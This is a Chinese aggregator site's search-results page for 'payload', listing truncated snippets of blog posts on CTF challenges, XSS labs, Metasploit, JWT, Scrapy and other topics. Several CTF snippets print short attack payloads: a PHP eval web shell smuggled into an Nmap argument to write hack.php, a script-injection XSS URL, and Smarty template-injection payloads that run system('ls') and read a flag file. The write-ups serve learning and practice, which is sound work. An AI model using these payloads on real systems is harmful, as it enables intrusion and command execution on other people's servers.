码迷,mamicode.com
首页 >  
搜索关键字:payload    ( 762个结果
[网鼎杯 2020 朱雀组]Nmap
和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o ...
分类:其他好文   时间:2020-05-29 19:49:08    阅读次数:352
scrapy post请求 request payload 请求
# payload 请求方式 yield scrapy.Request(url=url, method='POST', dont_filter=True, meta={ 'xx': 'dd' }, headers=headers, body=json.dumps(ex_data), callback ...
分类:其他好文   时间:2020-05-28 21:58:46    阅读次数:118
XSS挑战20关
第一关: 没有过滤,直接构造payload过关: http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/script%3E 第二关: 输入之后观察页面源代码可以看到被转义 Payload:?keyword... ...
分类:其他好文   时间:2020-05-25 22:32:39    阅读次数:125
ASP.Net Core 3.1 中使用JWT认证
原文:ASP.Net Core 3.1 中使用JWT认证 JWT认证简单介绍 关于Jwt的介绍网上很多,此处不在赘述,我们主要看看jwt的结构。 JWT主要由三部分组成,如下: HEADER.PAYLOAD.SIGNATURE HEADER包含token的元数据,主要是加密算法,和签名的类型,如下面... ...
分类:Web程序   时间:2020-05-24 00:44:03    阅读次数:80
metasploit 技术功能模块介绍
文件位置 /usr/share/metasploit-framework/modules/ 技术功能模块介绍 exploits 利用系统漏洞进行攻击的操作,此模块对应每一个具体漏洞的攻击方法 payload 成功exploit之后,真正在目标系统执行的代码攻击 evasion 专门针对windows ...
分类:Web程序   时间:2020-05-23 16:50:33    阅读次数:120
Portswigger-web-security-academy:dom-base_xss
dom base_xss [toc] DOM XSS in sink using source 题目描述 搜索功能点调用了 函数,借此函数调用 解题步骤 看着语句写payload 包围 构造payload: DOM XSS in sink using source 题目描述 这道题的搜索功能点会使用 ...
分类:Web程序   时间:2020-05-23 14:57:01    阅读次数:75
[BJDCTF2020]ZJCTF,不过如此
知识点: preg_replace()使用的/e模式可以存在远程执行代码 解析见链接:https://xz.aliyun.com/t/2557 看题目 首先是一段源代码: text是PHP的DATA伪协议 file是PHP的filter伪协议 payload: 得到第二段源代码: payload如下 ...
分类:其他好文   时间:2020-05-23 13:12:07    阅读次数:46
Flutter从入门到入土(三)网络请求Dio
1、网络请求 1 Dio _dio = new Dio(); 2 3 Future getInformationJson(User user) async { 4 5 var url = 'http://xxx/xxx/xxx?username=' + user._username + 6 '&pa ...
分类:其他好文   时间:2020-05-20 23:56:13    阅读次数:101
Linux下利用动态链接劫持库函数并注入代码
关于环境变量$ LD_PRELOAD $LD_PRELOAD是一个环境变量,用于加载动态库,他的优先级是最高的 一个挑战就是,这玩意可以产生一个shell,就像下面这样: 劫持库函数 假设存在一段这样的代码,其编译过程 好的我们来覆写一下这个函数 构造Payload 参考文献 "Hijacking ...
分类:系统相关   时间:2020-05-18 16:01:44    阅读次数:115
[BJDCTF2020]The mystery of ip
知识点 SSTI smarty 抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入 测试了一下,是smarty注入smarty注入payload {if phpinfo()}{/if} {if system('ls')}{/if} { readfile('/fla ...
分类:其他好文   时间:2020-05-15 00:42:59    阅读次数:145
762条   上一页 1 ... 8 9 10 11 12 ... 77 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!